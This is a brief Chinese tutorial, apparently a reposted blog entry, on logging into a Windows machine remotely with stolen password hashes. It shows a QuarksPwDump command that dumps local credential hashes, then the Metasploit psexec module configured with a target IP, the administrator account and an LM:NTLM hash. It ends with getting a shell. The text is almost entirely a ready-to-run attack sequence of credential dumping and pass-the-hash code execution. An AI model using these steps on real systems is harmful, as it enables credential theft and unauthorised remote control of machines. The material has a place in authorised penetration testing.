Metasploit -- 利用Hash远程登录

Delina

原文链接：Metasploit -- 利用Hash远程登录
一、利用QuarksPwDump获取hash值

quarkspwdump --dump-hash-local --output 1.txt
​

二、利用msf远程登录
1、选择攻击模块

1. use exploit/windows/smb/psexec<img _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" alt="" width="15" border="0">

复制代码

2、设置相关参数

1. <code>set rhosts 192.168.139.129</code><code>set smbuser administrator</code><code>set smbpass AAD3B435B51404EEAAD3B435B51404EE:AE15921C10DC81E86C2BFFED52D24A8F</code>

复制代码

3、run，运行
​
4、获取shell，如果有乱码使用chcp 65001解决
​